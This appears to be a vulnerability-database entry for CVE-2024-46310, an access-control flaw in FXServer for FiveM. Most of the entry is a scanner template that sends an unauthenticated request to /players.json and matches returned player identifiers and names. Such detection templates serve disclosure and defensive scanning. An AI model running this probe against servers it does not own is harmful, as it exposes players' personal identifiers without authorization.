漏洞描述
Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint.
CVE-2024-46310: FXServer < v9601 - Information Exposure
PoC代码[已公开]
id: CVE-2024-46310
info:
name: FXServer < v9601 - Information Exposure
author: s4e-io
severity: medium
description: |
Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint.
reference:
- https://github.com/UwUtisum/CVE-2024-46310
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-46310
- https://vulners.com/githubexploit/D31ED8EC-1E21-54F9-AD42-778DAFBC8B4E
classification:
epss-score: 0.68747
epss-percentile: 0.98581
metadata:
verified: true
max-request: 1
vendor: fxserver
product: fxserver
tags: cve,cve2024,fxserver,info-leak
http:
- raw:
- |
GET /players.json HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"endpoint", "id", "identifiers", "name", "ping")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100d2ff86b87e70b1ab5bddfce2e3708ab90567fb7f4a97c3d7222f95d7cabab7b1022100c7cfcacab1df208d552a91174c6af975c84eaed162fc57d6e502b41040e7d9e8:922c64590222798bb761d5b6d8e72950